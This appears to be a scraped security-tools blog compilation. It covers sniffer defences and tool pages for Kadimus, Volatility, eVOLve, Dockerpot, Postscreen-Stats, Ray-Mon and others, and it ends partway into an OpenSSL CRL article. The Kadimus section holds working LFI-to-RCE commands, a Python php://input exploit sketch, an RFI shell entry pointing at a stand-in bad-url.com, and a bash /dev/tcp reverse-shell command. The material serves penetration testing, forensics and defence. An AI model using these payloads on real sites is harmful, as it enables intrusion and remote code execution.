Part of the problem is that companies tend to invest more in new features than in added security. New security features can make systems more difficult to configure and less convenient to use.

Another part of the problem is the added cost of Ethernet switches and of network interfaces that do not support the "promiscuous" mode that sniffers rely on.

CONCLUSION

The question that remains is: how can we protect ourselves from this threat?

  • Network cards that cannot be put into "promiscuous" mode. Thus, computers cannot be taken over and turned into "sniffers".
  • Typically, the Ethernet interface only passes up to the higher-level protocol those packets that are intended for the local machine. Putting the interface into promiscuous mode allows all packets to be accepted and passed to the higher layers of the protocol stack, which enables the selection an attacker wants.
  • Protocols that encrypt data in transit over the network, thus preventing passwords from flowing "in the clear".

I would remind you that the safest approach is to adopt and encourage the use of software that enables encrypted remote access sessions; this goes a long way toward making your environment more secure.

One fairly common encryption technology currently used for secure communication between remote machines is SSH (Secure Shell). SSH is available for different platforms. Its use does not prevent the password from being captured on the wire, but since it is encrypted it is of no use to the attacker. SSH negotiates connections using the RSA algorithm. Once the service is authenticated, all subsequent traffic is encrypted using the IDEA algorithm. This type of encryption is very strong.

In the future, security will be increasingly intrinsic to systems and network infrastructure. There is no use in having all the security "apparatus" you need if you do not use it. Nothing can be made completely secure. Remember, no one is 100% secure.

Kadimus For LFI / RFI Scan And Exploit Tool


Kadimus

LFI Scan & Exploit Tool

Kadimus is a tool to check sites for LFI vulnerabilities, and also to exploit them.

Features:

  • Check all url parameters
  • /var/log/auth.log RCE
  • /proc/self/environ RCE
  • php://input RCE
  • data://text RCE
  • Source code disclosure
  • Multi thread scanner
  • Command shell interface through HTTP Request
  • Proxy support (socks4://, socks4a://, socks5:// ,socks5h:// and http://)
  • Proxy socks5 support for bind connections

Compile:

$ git clone https://github.com/P0cL4bs/Kadimus.git
$ cd Kadimus

You can run the configure file:

./configure

Or follow these steps:

Installing libcurl:

  • CentOS/Fedora
# yum install libcurl-devel
  • Debian based
# apt-get install libcurl4-openssl-dev

Installing libpcre:

  • CentOS/Fedora
# yum install pcre-devel
  • Debian based
# apt-get install libpcre3-dev

Installing libssh:

  • CentOS/Fedora
# yum install libssh-devel
  • Debian based
# apt-get install libssh-dev

And finally:

$ make

Options:

  -h, --help                    Display this help menu

  Request:
    -B, --cookie STRING         Set custom HTTP Cookie header
    -A, --user-agent STRING     User-Agent to send to server
    --connect-timeout SECONDS   Maximum time allowed for connection
    --retry-times NUMBER        number of times to retry if connection fails
    --proxy STRING              Proxy to connect, syntax: protocol://hostname:port

  Scanner:
    -u, --url STRING            Single URI to scan
    -U, --url-list FILE         File contains URIs to scan
    -o, --output FILE           File to save output results
    --threads NUMBER            Number of threads (2..1000)

  Explotation:
    -t, --target STRING         Vulnerable Target to exploit
    --injec-at STRING           Parameter name to inject exploit
                                (only need with RCE data and source disclosure)

  RCE:
    -X, --rce-technique=TECH    LFI to RCE technique to use
    -C, --code STRING           Custom PHP code to execute, with php brackets
    -c, --cmd STRING            Execute system command on vulnerable target system
    -s, --shell                 Simple command shell interface through HTTP Request

    -r, --reverse-shell         Try spawn a reverse shell connection.
    -l, --listen NUMBER         port to listen

    -b, --bind-shell            Try connect to a bind-shell
    -i, --connect-to STRING     Ip/Hostname to connect
    -p, --port NUMBER           Port number to connect
    --b-proxy STRING            IP/Hostname of socks5 proxy
    --b-port NUMBER             Port number of socks5 proxy

    --ssh-port NUMBER           Set the SSH Port to try inject command (Default: 22)
    --ssh-target STRING         Set the SSH Host

    RCE Available techniques

      environ                   Try run PHP Code using /proc/self/environ
      input                     Try run PHP Code using php://input
      auth                      Try run PHP Code using /var/log/auth.log
      data                      Try run PHP Code using data://text

    Source Disclosure:
      -G, --get-source          Try get the source files using filter://
      -f, --filename STRING     Set filename to grab source [REQUIRED]
      -O FILE                   Set output file (Default: stdout)

Examples:

Scanning:

./kadimus -u localhost/?pg=contact -A my_user_agent
./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0

Get source code of file:

./kadimus -t localhost/?pg=contact -G -f "index.php%00" -O local_output.php --inject-at pg

Execute php code:

./kadimus -t localhost/?pg=php://input%00 -C '<?php echo "pwned"; ?>' -X input
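
Under the hood, the php://input technique boils down to making the vulnerable parameter include php://input while the PHP code to run is sent as the request body. A hand-rolled sketch of the same request, using Python's requests library (the URL and parameter are the hypothetical ones from the example above):

import requests

target = "http://localhost/?pg=php://input"
php_code = '<?php echo "pwned"; ?>'

# the request body is what php://input returns, so the vulnerable include executes it
response = requests.post(target, data=php_code)
print(response.text)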

Execute command:

./kadimus -t localhost/?pg=/var/log/auth.log -X auth -c 'ls -lah' --ssh-target localhost

Checking for RFI:

You can also check for RFI; just put the remote URL in resource/common_files.txt together with the regex that identifies it, for example:

/* http://bad-url.com/shell.txt */
<?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>

in file:

http://bad-url.com/shell.txt?:scorpion say get over here
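
In the common_files.txt entry above, the text after the "?:" separator is the regex Kadimus matches against the response, and the PHP shown simply echoes that marker string. You can confirm that the base64 payload decodes to exactly that marker:

import base64

print(base64.b64decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU=").decode())
# -> scorpion say get over here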

Reverse shell:

./kadimus -t localhost/?pg=contact.php -Xdata --inject-at pg -r -l 12345 -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1' --retry-times 0

More information can be found at: https://github.com/P0cL4bs/Kadimus

Volatility – An Advanced Open Source Memory Forensics Framework


Quick Start

  • Choose a release – the most recent is Volatility 2.4, released August 2014. Older versions are also available on the Releases page or respective release pages. If you want the cutting edge development build, use a git client and clone the master.
  • Install the code – Volatility is packaged in several formats, including source code in zip or tar archive (all platforms), a Pyinstaller executable (Windows only) and a standalone executable (Windows only). For help deciding which format is best for your needs, and for installation or upgrade instructions, see Installation.
  • Target OS specific setup – the Linux, Mac, and Android support may require accessing symbols and building your own profiles before using Volatility. If you plan to analyze these operating systems, please see Linux, Mac, or Android.
  • Read usage and plugins – command-line parameters, options, and plugins may differ between releases. For the most recent information, see Volatility Usage and Command Reference.
  • Communicate – If you have documentation, patches, ideas, or bug reports, you can communicate them through the github interface, IRC (#volatility on freenode), the Volatility Mailing List or Twitter (@volatility).
  • Develop – For advanced users who want to develop their own plugins, address spaces, and other components of volatility, there is a recommended StyleGuide.

Why Volatility

  • A single, cohesive framework analyzes RAM dumps from 32- and 64-bit windows, linux, mac, and android systems. Volatility’s modular design allows it to easily support new operating systems and architectures as they are released. All your devices are targets…so don’t limit your forensic capabilities to just windows computers.

  • It's open source (GPLv2), which means you can read it, learn from it, and extend it. Why use a tool that outputs results without giving you any indication where the values came from or how they were interpreted? Learn how your tools work, understand why and how to tweak and enhance them – help yourself become a smarter analyst. You can also immediately fix any issues you discover, instead of having to wait weeks or months for vendors to communicate, reproduce, and publish patches.
  • It's written in Python, an established forensic and reverse engineering language with loads of libraries that can easily integrate into Volatility. Most analysts are already familiar with Python and don't want to learn new languages; windbg's scripting syntax, for example, is often seen as cryptic, and many times the capabilities just aren't there. Other memory analysis frameworks require you to use Visual Studio to compile C# DLLs, and the rest don't expose a programming API at all.
  • Runs on windows, linux, or mac analysis systems (anywhere Python runs) – a refreshing break from other memory analysis tools that only run on windows and require .NET installations and admin privileges just to open. If you’re already accustomed to performing forensics on a particular host OS, by all means keep using it – and take volatility with you.
  • Extensible and scriptable API gives you the power to go beyond and continue innovating. For example you can use volatility to build a customized web interface or GUI, drive your malware sandbox, perform virtual machine introspection or just explore kernel memory in an automated fashion. Analysts can add new address spaces, plugins, data structures, and overlays to truly weld the framework to their needs. You can explore the Doxygen documentation for Volatility to get an idea of its internals.
  • Unparalleled feature sets based on reverse engineering and specialized research. Volatility provides capabilities that Microsoft's own kernel debugger doesn't allow, such as carving command histories, console input/output buffers, USER objects (GUI memory), and network related data structures. Just because it's not documented doesn't mean you can't analyze it!
  • Comprehensive coverage of file formats – volatility can analyze raw dumps, crash dumps, hibernation files, VMware .vmem, VMware saved state and suspended files (.vmss/.vmsn), VirtualBox core dumps, LiME (Linux Memory Extractor), expert witness (EWF), and direct physical memory over Firewire. You can even convert back and forth between these formats. In the heat of your incident response moment, don’t get caught looking like a fool when someone hands you a format your other tools can’t parse.
  • Fast and efficient algorithms let you analyze RAM dumps from large systems without unnecessary overhead or memory consumption. For example volatility is able to list kernel modules from an 80 GB system in just a few seconds. There is always room for improvement, and timing differs per command, however other memory analysis frameworks can take several hours to do the same thing on much smaller memory dumps.
  • Serious and powerful community of practitioners and researchers who work in the forensics, IR, and malware analysis fields. It brings together contributors from commercial companies, law enforcement, and academic institutions around the world. Don’t just take our word for it – check out the Volatility Documentation Project – a collection of over 200 docs from 60+ different authors. Volatility is also being built on by a number of large organizations such as Google, National DoD Laboratories, DC3, and many Antivirus and security shops.
  • Forensics/IR/malware focus – Volatility was designed by forensics, incident response, and malware experts to focus on the types of tasks these analysts typically perform. As a result, there are things that are often very important to a forensics analyst that are not as important to a person debugging a kernel driver (unallocated storage, indirect artifacts, etc).
  • Money-back guarantee – although volatility is free, we stand by our work. There is nothing another memory analysis framework can do that volatility can’t (or that it can’t be quickly programmed to do).

More information can be found at the following websites: https://github.com/volatilityfoundation/volatility, https://github.com/volatilityfoundation/volatility/wiki and http://www.volatilityfoundation.org

Evolve – An Python Based Web Interface For Memory Forensics Framework Volatility



Web interface for the Volatility Memory Forensics Framework https://github.com/volatilityfoundation/volatility

Current Version: 1.2 (2015-05-07)

Short video demo: https://youtu.be/55G2oGPQHF8 Pre-Scan video: https://youtu.be/mqMuQQowqMI

Installation

This requires Volatility to be installed as a library, not just an EXE file sitting somewhere. Run these commands in a shell:

Download Volatility source zip from https://github.com/volatilityfoundation/volatility
Inside the extracted folder run:
setup.py install

Then install these dependencies:
pip install bottle
pip install yara
pip install distorm3

  • Note: you may need to prefix sudo on the above commands depending on your OS.
  • Note: You may also need to prefix python if it is not in your run path.
  • Note: Windows may require distorm3 download: https://pypi.python.org/pypi/distorm3/3.3.0

Usage

-f File containing the RAM dump to analyze
-p Volatility profile to use during analysis
-d Optional path for output file. Default is beside memory image
-r comma separated list of plugins to run at the start

!!! WARNING: Avoid writing sqlite to NFS shares. They can lock or get corrupt. If you must, try mounting share with ‘nolock’ option.

Features

  • Works with any Volatility module that provides a SQLite render method (some don’t)
  • Automatically detects plugins – If volatility sees the plugin, so will eVOLve
  • All results stored in a single SQLite db beside the RAM dump (which can also be queried directly; see the sketch after this list)
  • Web interface is fully AJAX using jQuery & JSON to pass requests and responses
  • Uses Bottle module in Python to provide a standalone web server
  • Option to edit SQL query to provide enhanced data views with data from multiple tables
  • Run plugins and view data from any browser – even a tablet!
  • Allow multiple people to review results of single RAM dump
  • Multiprocessing for full CPU usage
  • Pre-Scan runs a list of plugins at the start
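
Because the results live in an ordinary SQLite file, they can also be examined outside the web interface. A minimal sketch with Python's sqlite3 module (the database file name and the pslist table here are assumptions for illustration; actual table names follow the plugins you have run):

import sqlite3

conn = sqlite3.connect("memdump.vmem.db")   # hypothetical db created beside the RAM dump

# list which plugin result tables exist
for (name,) in conn.execute("SELECT name FROM sqlite_master WHERE type='table'"):
    print("table:", name)

# peek at a few rows of one plugin's output (table name is an assumption)
for row in conn.execute("SELECT * FROM pslist LIMIT 5"):
    print(row)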

Coming Features

  • Save custom queries for future use
  • Import/Export queries to share with others
  • Threading for more responsive interface while modules are running
  • Export/save of table data to JSON, CSV, etc
  • Review mode which requires only the generated SQLite file for better portability

Please send your ideas for features!

Release notes:
v1.0 – Initial release
v1.1 – Threading, Output folder option, removed unused imports
v1.2 – Pre-Scan option to run list of plugins at the start


More information can be found at: https://github.com/JamesHabben/evolve

Dockerpot – A Docker Based Honeypot


Dockerpot is a Docker-based honeypot.

Installation

Install the necessary software

$ sudo apt-get update
$ sudo apt-get install docker.io socat xinetd auditd

$ # for installing nsenter
$ docker run --rm -v /usr/local/bin:/target jpetazzo/nsenter

Install the honeypot scripts

Copy honeypot to /usr/bin/honeypot and honeypot.clean to /usr/bin/honeypot.clean and make them executable. You may have to customize the ports in the iptables rules, the memory limit of the container and the network quota if you want to run anything other than an SSH honeypot on port 22.

Configure crond, xinetd and auditd

crond

Add the following line to /etc/crontab. This runs the cleanup script to check for old containers every 5 minutes.

*/5 * * * * /usr/honeypot/honeypot.clean

xinetd

Create the following service file in /etc/xinetd.d/honeypot and add the line honeypot 22/tcp to /etc/services to keep xinetd happy.

# Container launcher for an SSH honeypot
service honeypot
{
        disable         = no
        instances       = UNLIMITED
        server          = /usr/bin/honeypot
        socket_type     = stream
        protocol        = tcp
        port            = 22
        user            = root
        wait            = no
        log_type        = SYSLOG authpriv info
        log_on_success  = HOST PID
        log_on_failure  = HOST
}

auditd

Enable logging of the execve system call in auditd by appending the following lines to /etc/audit/audit.rules.

-a exit,always -F arch=b64 -S execve
-a exit,always -F arch=b32 -S execve

Create a base image for the honeypot

Create and configure a base image for the honeypot. The container will be run using the command /sbin/init so place your initialization script there or configure an init system of your choice. Make sure to commit the image as “honeypot:latest”. You should also create an account named user and give it a weak password like 123456 to let brute-force attackers crack your host. The ip address of the attacker’s host is passed to the container in the environment variable “REMOTE_HOST”. For logging you might want to additionally configure an rsyslog instance to forward logs to the host machine at 172.17.42.1.
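
For illustration, a very small /sbin/init could look like the Python sketch below. This is not part of dockerpot itself; it assumes OpenSSH is installed in the image, logs the attacker's address and then hands control to sshd:

#!/usr/bin/env python
import os
import subprocess
import syslog

# the launcher passes the attacker's address in REMOTE_HOST
remote = os.environ.get("REMOTE_HOST", "unknown")
syslog.openlog("honeypot")
syslog.syslog(syslog.LOG_INFO, "container started for remote host %s" % remote)

# keep sshd in the foreground so the container stays alive
subprocess.call(["/usr/sbin/sshd", "-D"])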


More information about this project can be found at: http://www.itinsight.hu/blog/posts/2015-05-04-creating-honeypots-using-docker.html and at: https://github.com/mrschyte/dockerpot

Postscreen-Stats – A simple script to parse Postscreen logs


Postscreen Statistics Parser

A simple script to compute statistics on Postfix/Postscreen activity. Run it against your Postfix syslogs.

Published under GPL v2

Usage


postscreen_stats.py
    parses postfix logs to compute statistics on postscreen activity

usage: postscreen_stats.py -f mail.log

  -a|--action=   action filter with operators | and &
                      ex. 'PREGREET&DNSBL|HANGUP' = ((PREGREET and DNSBL) or HANGUP)
                      ex. 'HANGUP&DNSBL|PREGREET&DNSBL' 
                          = ((HANGUP and DNSBL) or (PREGREET and DNSBL))

  -f|--file=     log file to parse (default to /var/log/maillog)

  -g            /!\ slow ! ip geoloc against hostip.info (default disabled)

  --geofile=    path to a maxmind geolitecity.dat. if specified, with the -g switch
                the script uses the maxmind data instead of hostip.info (faster)

  -G            when using --geofile, use the pygeoip module instead of the GeoIP module

  -i|--ip=      filters the results on a specific IP

  --mapdest=    path to a destination HTML file that will display a Google Map of the result
                  /!\ Require the geolocation, preferably with --geofile

  --map-min-conn=   When creating a map, only map the IPs that have connected X number of times

  -r|--report=  report mode {short|full|ip|none} (default to short)

  -y|--year=    select the year of the logs (default to current year)

  --rfc3339     to set the timestamp type to "2012-04-13T08:53:00+02:00" instead of the regular syslog format "Oct 23 04:02:17"

example: $ ./postscreen_stats.py -f maillog.3 -r short -y 2011 --geofile=../geoip/GeoIPCity.dat -G --mapdest=postscreen_report_2012-01-15.html

Julien Vehent (http://1nw.eu/!j) - https://github.com/jvehent/Postscreen-Stats

Basic usage

Generate a report from a syslog postfix log file. If you are parsing logs from a year that is not the current year, use the -y option to specify the year of the logs.

$ python postscreen_stats.py -f maillog.1 -r short -y 2011
=== unique clients/total postscreen actions ===
2131/11010 CONNECT
1/1 BARE NEWLINE
30/33 COMMAND COUNT LIMIT
13/16 COMMAND PIPELINING
6/6 COMMAND TIME LIMIT
463/536 DNSBL
305/503 HANGUP
12/15 NON-SMTP COMMAND
1884/2258 NOQUEUE 450 deep protocol test reconnection
1/42 NOQUEUE too many connections
1577/1600 PASS NEW
866/8391 PASS OLD
181/239 PREGREET
5/84 WHITELISTED

=== clients statistics ===
4 avg. dnsbl rank
505 blocked clients
2131 clients
840 reconnections
32245.4285714 seconds avg. reco. delay

=== First reconnection delay (graylist) ===
delay| <10s   |>10to30s| >30to1m| >1to5m | >5to30m|>30mto2h| >2hto5h|>5hto12h|>12to24h| >24h   |
count|12      |21      |21      |196     |261     |88      |40      |29      |53      |119     |
   % |1.4     |2.5     |2.5     |23      |31      |10      |4.8     |3.5     |6.3     |14      |

Get the statistics for a specific IP only

$ python postscreen_stats.py -f maillog.1 -r ip -i 1.2.3.4
Filtering results to match: 1.2.3.4
1.2.3.4
    connections count: 2
    first seen on 2011-10-22 09:37:54
    last seen on 2011-10-22 09:38:00
    DNSBL count: 1
    DNSBL ranks: ['6']
    HANGUP count: 2

Geo Localisation of blocked IPs

There are 3 GeoIP modes:

  1. Use hostip.info online geoip service. This is free but slow and not very accurate
  2. Use Maxmind’s GeoIP database with the GeoIP python module. You can use either the free version of the DB from their website, or get a paid version.
  3. Use Maxmind’s GeoIP database with the pygeoip module (enabled by the -G switch).

To use hostip.info, just set the -g option. To use Maxmind, set --geofile to point to your Maxmind DB (ie. --geofile=/path/to/GeoIPCity.dat). By default, --geofile uses the GeoIP python module, but if you prefer to use pygeoip instead, set the -G option as well.

$ ./postscreen_stats.py -r short --geofile=../geoip/GeoIPCity.dat -G -f maillog.3 -y 2011

[….]

=== Top 20 Countries of Blocked Clients ===
 167 (33.00%) United States
  59 (12.00%) India
  33 ( 6.50%) Russian Federation
  26 ( 5.10%) Indonesia
  23 ( 4.60%) Pakistan
  21 ( 4.20%) Vietnam
  20 ( 4.00%) China
  13 ( 2.60%) Brazil
  11 ( 2.20%) Korea, Republic of
   9 ( 1.80%) Belarus
   8 ( 1.60%) Turkey
   7 ( 1.40%) Iran, Islamic Republic of
   7 ( 1.40%) Ukraine
   6 ( 1.20%) Kazakstan
   6 ( 1.20%) Chile
   5 ( 0.99%) Italy
   5 ( 0.99%) Romania
   4 ( 0.79%) Poland
   4 ( 0.79%) Spain
   3 ( 0.59%) Afghanistan

Geo IP database installation

Using the MaxMind free database at http://www.maxmind.com/app/geolitecity:

  1. Download the database and extract GeoLiteCity.dat at the location of your choice
  2. Install the GeoIP maxmind package: # aptitude install python-geoip
  3. Launch postscreen_stats with --geofile="/path/to/geolitecity.dat"

Google Map of the blocked IPs

You can use the --mapdest option to create an HTML file with a map of the blocked IPs.

$ ./postscreen_stats.py -f maillog.3 -r none -y 2011 --geofile=../geoip/GeoIPCity.dat -G --mapdest=postscreen_report_2012-01-15.html

Google map will be generated at postscreen_report_2012-01-15.html
using MaxMind GeoIP database from ../geoip/GeoIPCity.dat
Creating HTML map at postscreen_report_2012-01-15.html

If you have a lot of IPs to map, you can use --map-min-conn to only map IPs that connected X+ number of times.

./postscreen_stats.py -f maillog.3 -y 2011 -g --geofile=../geoip/GeoIPCity.dat -G --mapdest=testmap.html --map-min-conn=5


More information can be found on: https://github.com/jvehent/Postscreen-Stats

DetectIndent – Vim script for automatically detecting indent settings


A Vim plugin, for automatically detecting indent settings. This plugin adds a :DetectIndent command, which tries to intelligently set the ‘shiftwidth’, ‘expandtab’ and ‘tabstop’ options based upon the existing settings in use in the active file.

You may wish to consider one of the many forks of this project. Be aware that some of these forks have merged patches that I have been ignoring for good reasons, and that long lists of special cases are not necessarily a good idea…


More information can be found on: https://github.com/ciaranm/detectindent

PGP Finder – Find PGP keys on keyservers and show the details of each key


PGP Finder

A simple, not so smart, client to search key servers and print the details of found keys. It’s more of a proof of concept for the openpgp Go module than anything else. And I don’t intend to make it particularly useful…

$ go run pgpfinder.go -search jvehent -v

searching at http://gpg.mozilla.org:80/pks/lookup?op=vindex&options=mr&search=jvehent
querying http://gpg.mozilla.org:80/pks/lookup?op=get&options=mr&search=0x4FB5544F
querying http://gpg.mozilla.org:80/pks/lookup?op=get&options=mr&search=0x3B763E8F
querying http://gpg.mozilla.org:80/pks/lookup?op=get&options=mr&search=0x3556EF3A
found 3 keys on http://gpg.mozilla.org:80 for jvehent

========       Details of Key ID 65BE0EFC4FB5544F       ========
Fingerprint: 6F7071509123FDABD85A43EA65BE0EFC4FB5544F
Creation Time: 2014-01-28 12:23:02 -0500 EST
Pubkey algorithm: RSA
Public Modulus: 2048 bits. Public exponent: 65537
Identities:
- Julien Vehent Mozilla Investigator (Mozilla Investigator Signing Key for Julien Vehent. Contact opsec@mozilla.com) <jvehent+mig@mozilla.com>
    signatures:

================================================================

========       Details of Key ID A3D652173B763E8F       ========
Fingerprint: E60892BB9BD89A69F759A1A0A3D652173B763E8F
Creation Time: 2013-04-30 12:05:37 -0400 EDT
Pubkey algorithm: RSA
Public Modulus: 2048 bits. Public exponent: 65537
Identities:
- Julien Vehent (ulfr) <jvehent@mozilla.com>
    signatures:
    - 5FEE05E6A56E15A3 2013-10-04 12:37:25 -0400 EDT
    - 13CE04062983AB4B 2013-10-11 19:51:43 -0400 EDT
    - FDBE31EE3033CB4E 2014-03-25 17:12:53 -0400 EDT
    - C7578A5395612E47 2014-03-18 13:39:33 -0400 EDT
    - 25ADBFC5B42BC501 2014-03-25 17:09:51 -0400 EDT
    - F0A9E7DCD39E452E 2014-03-18 13:44:55 -0400 EDT
    - B7207AAB28A860CE 2013-10-04 12:24:10 -0400 EDT
    - F2ECB29133DB65A0 2013-05-08 16:10:52 -0400 EDT
    - 87DF65059EF093D3 2014-03-18 13:40:21 -0400 EDT
    - A4AB57D80525636A 2014-03-18 13:41:04 -0400 EDT
    - EC36FEE86B8579BF 2014-03-18 13:41:21 -0400 EDT
    - 39DC218DC20B410B 2014-03-18 13:43:25 -0400 EDT
    - 5CDBCABCB7116A0 2014-03-18 13:49:32 -0400 EDT
    - 7813901286EDAAC4 2014-03-18 13:51:32 -0400 EDT
    - 72E07B272580198E 2014-03-18 14:39:27 -0400 EDT
    - 3342E1B667A38863 2014-03-25 17:11:45 -0400 EDT
    - EAD831C6F616AB35 2013-10-04 13:12:02 -0400 EDT
    - B573F0908DA0D143 2013-05-08 15:47:38 -0400 EDT
    - 9F96B92930380381 2013-10-08 06:53:54 -0400 EDT
    - 80D30F5A3D16045C 2014-03-25 17:29:34 -0400 EDT
    - BC17301B491B3F21 2013-05-07 13:48:47 -0400 EDT
    - D9B347EA9DF43DBB 2013-10-08 09:05:45 -0400 EDT
    - 825E72461A1B8499 2013-10-10 17:42:44 -0400 EDT
    - 8262833620A64C3F 2013-10-04 12:31:31 -0400 EDT
    - 100C9B89DF55A146 2014-03-25 17:09:47 -0400 EDT
    - BD897970048474F9 2014-03-25 17:14:18 -0400 EDT
    - 23BAD351C916B67D 2013-10-04 13:22:52 -0400 EDT
- Julien Vehent (personal) <julien@linuxwall.info>
    signatures:
    - FDBE31EE3033CB4E 2014-03-25 17:12:38 -0400 EDT
    - 25ADBFC5B42BC501 2014-03-25 17:09:37 -0400 EDT
    - F0A9E7DCD39E452E 2014-03-18 13:44:55 -0400 EDT
    - B7207AAB28A860CE 2013-10-04 12:24:10 -0400 EDT
    - EC36FEE86B8579BF 2014-03-18 13:41:21 -0400 EDT
    - 39DC218DC20B410B 2014-03-18 13:43:25 -0400 EDT
    - 5CDBCABCB7116A0 2014-03-18 13:49:32 -0400 EDT
    - 72E07B272580198E 2014-03-18 14:39:24 -0400 EDT
    - F2ECB29133DB65A0 2014-03-25 17:12:16 -0400 EDT
    - 3342E1B667A38863 2014-03-25 17:11:39 -0400 EDT
    - EAD831C6F616AB35 2013-10-04 13:12:02 -0400 EDT
    - 80D30F5A3D16045C 2014-03-25 17:29:34 -0400 EDT
    - 100C9B89DF55A146 2014-03-25 17:09:46 -0400 EDT
    - BD897970048474F9 2014-03-25 17:14:14 -0400 EDT

================================================================

========       Details of Key ID C0826E8B3556EF3A       ========
Fingerprint: 340A3801993728D8C15CA46AC0826E8B3556EF3A
Creation Time: 2005-03-04 06:39:55 -0500 EST
Pubkey algorithm: RSA
Public Modulus: 1024 bits. Public exponent: 41
Identities:
- VEHENT Julien <jvehent@free.fr>
    signatures:
    - C0826E8B3556EF3A 2005-03-04 06:43:21 -0500 EST

================================================================


More information can be found on: https://github.com/jvehent/pgpfinder


Ray-Mon – PHP and Bash server status monitoring


Ray-Mon is a linux server monitoring script written in PHP and Bash, utilizing JSON as data storage. It requires only bash and a webserver on the client side, and only php on the server side. The client currently supports monitoring processes, uptime, updates, amount of users logged in, disk usage, RAM usage and network traffic.

Features

  • Ping monitor
  • History per host
  • Threshold per monitored item.
  • Monitors:
    • Processes (lighttpd, apache, nginx, sshd, munin etc.)
    • RAM
    • Disk
    • Uptime
    • Users logged on
    • Updates
    • Network (RX/TX)

Download

Either git clone the github repo:

git clone git://github.com/RaymiiOrg/raymon.git

Or download the zipfile from github:

https://github.com/RaymiiOrg/raymon/zipball/master

Or download the zipfile from Raymii.org

https://raymii.org/s/inc/software/raymon-0.0.2.zip

This is the github page: https://github.com/RaymiiOrg/raymon/

Changelog

v0.0.2
  • Server side now only requires 1 script instead of 2.
  • Client script creates the json better, if a value is missing the json file doesn’t break.
  • Changed the visual style to a better layout.
  • Thresholds implemented and configurable.
  • History per host now implemented.
v0.0.1
  • Initial release

Install

Client

The client.sh script is a bash script which outputs JSON. It requires root access and should be run as root. It also requires a webserver, so that the server can get the json file.

Software needed for the script:

  • bash
  • awk
  • grep
  • ifconfig
  • package managers supported: apt-get, yum and pacman (debian/ubuntu, centos/RHEL/SL, Arch)

Setup a webserver (lighttpd, apache, boa, thttpd, nginx) for the script output. If there is already a webserver running on the server, you don’t need to install another one.

Edit the script:

Network interfaces. The first one is used for the IP, the second one is used for bandwidth calculations. This is done because OpenVZ has the “venet0” interface for the bandwidth, and the venet0:0 interface with an IP. If you run bare-metal, KVM, vserver etc. you can set these two to the same value (eth0, eth1 etc.).

# Network interface for the IP address
iface="venet0:0"
# network interface for traffic monitoring (RX/TX bytes)
iface2="venet0"

The IP address of the server: I use this when deploying the script via Chef or Ansible. You can set it, but it is not required.

Services are checked by doing a ps to see if the process is running. The last service should be defined without a comma, for valid JSON. The code below monitors “sshd”, “lighttpd”, “munin-node” and “syslog”.

SERVICE=lighttpd
if ps ax | grep -v grep | grep $SERVICE > /dev/null; then echo -n "\"$SERVICE\" : \"running\","; else echo -n "\"$SERVICE\" : \"not running\","; fi
SERVICE=sshd
if ps ax | grep -v grep | grep $SERVICE > /dev/null; then echo -n "\"$SERVICE\" : \"running\","; else echo -n "\"$SERVICE\" : \"not running\","; fi
SERVICE=syslog
if ps ax | grep -v grep | grep $SERVICE > /dev/null; then echo -n "\"$SERVICE\" : \"running\","; else echo -n "\"$SERVICE\" : \"not running\","; fi
#LAST SERVICE HAS TO BE WITHOUT , FOR VALID JSON!!!
SERVICE=munin-node
if ps ax | grep -v grep | grep $SERVICE > /dev/null; then echo -n "\"$SERVICE\" : \"running\""; else echo -n "\"$SERVICE\" : \"not running\""; fi

To add a service, copy the 2 lines and replace the SERVICE=processname with the actual process name:

SERVICE=processname
if ps ax | grep -v grep | grep $SERVICE > /dev/null; then echo -n "\"$SERVICE\" : \"running\","; else echo -n "\"$SERVICE\" : \"not running\","; fi

Also, make sure the last service monitored does not echo a comma at the end, otherwise the JSON is not valid and the PHP script fails.

Now setup a cronjob to execute the script on a set interval and save the JSON to the webserver directory.

As root, create the file /etc/cron.d/raymon-client with the following contents:

SHELL=/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
*/5 * * * * root /root/scripts/client.sh | sed ':a;N;$!ba;s/\n//g' > /var/www/stat.json

In my case, the client script is in /root/scripts, and my webserver directory is /var/www. Change this to match your own setup. You might also want to change the time interval: */5 executes the script every 5 minutes. The sed command is in there to remove the newlines, which creates a shorter JSON file and saves a few KB. The root field after the cron schedule is special to files in /etc/cron.d/; it tells cron which user to execute the command as.

When this is setup you should get a stat.json file in the /var/www/ folder containing the status json. If so, the client is setup correctly.

Server

The status server is a PHP script which fetches the JSON files from the clients every 5 minutes, saves them and displays them. It also saves history, as described below.

Requirements:

  • Webserver with PHP (min. 5.2) and write access to the folder the script is located.

Steps:

Create a new folder on the webserver and make sure the webserver user (www-data) can write to it.

Place the php file “stat.php” in that folder.

Edit the host list in the php file to include your clients:

The first parameter is the filename the json file is saved to, and the second is the URL where the json file is located.

$hostlist=array(
                'example1.org.json' => 'http://example1.org/stat.json',
                'example2.nl.json' => 'http://example2.nl/stat.json',
                'special1.network.json' => 'http://special1.network.eu:8080/stat.json',
                'special2.network.json' => 'https://special2.network.eu/stat.json'
                );

Edit the values for the ping monitor:

$pinglist = array(
                  'github.com',
                  'google.nl',
                  'tweakers.net',
                  'jupiterbroadcasting.com',
                  'lowendtalk.com',
                  'lowendbox.com' 
                  );

Edit the threshold values:

## Set this to "secure" the history saving. This key has to be given as a parameter to save the history.
$historykey = "8A29691737D";
#the below values set the threshold before a value gets shown in bold on the page.
# Max updates available
$maxupdates = "10";
# Max users concurrently logged in
$maxusers = "3";
# Max load.
$maxload = "2";
# Max disk usage (in percent)
$maxdisk = "75";
# Max RAM usage (in percent)
$maxram = "75";

History

To save the history you have to setup a cronjob to get the status page with a special “history key”. You define this in the stat.php file:

## Set this to "secure" the history saving. This key has to be given as a parameter to save the history.
$historykey = "8A29691737D";    

And then the cronjob to get it:

## This saves the history every 8 hours. 
30 */8 * * * wget -qO /dev/null http://url-to-status.site/status/stat.php?action=save&&key=8A29691737D

The cronjob can be on any server which can access the status page, but preferably on the host where the status page is located.

OpenSSL: Manually verify a certificate against a CRL


This article shows you how to manually verify a certificate against a CRL. CRL stands for Certificate Revocation List and is one way to validate a certificate status. It is an alternative to OCSP, the Online Certificate Status Protocol.

You can read more about CRL’s on Wikipedia.

We will be using OpenSSL in this article. I’m using the following version:

$ openssl version
OpenSSL 1.0.2 22 Jan 2015

Get a certificate with a CRL

